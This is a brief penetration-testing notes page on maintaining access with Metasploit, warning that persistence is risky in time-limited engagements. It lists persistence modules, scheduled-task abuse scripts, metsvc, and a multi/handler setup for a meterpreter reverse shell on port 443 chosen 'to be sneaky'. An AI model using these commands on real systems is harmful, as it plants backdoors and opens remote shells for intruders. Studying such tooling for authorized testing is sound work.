Maintaining Access
Persistence is dangerous and usually unnecessary for junior-mid level pentesting (time limited engagements, not red teaming). It opens a port on a machine with no credentials--leaves it wide open for a future attack. You'll have to go back in and delete the service and remove it from the registry. It'll give you an RC file to go in and delete the files for you, but it's generally dangerous and unnecessary.
Persistence Scripts
meterpreter > run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence
If you want to get a meterpreter shell back:
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128
Scheduled Tasks
run scheduleme
run schtaskabuse
Metsvc
run metsvc -A
Last updated
Was this helpful?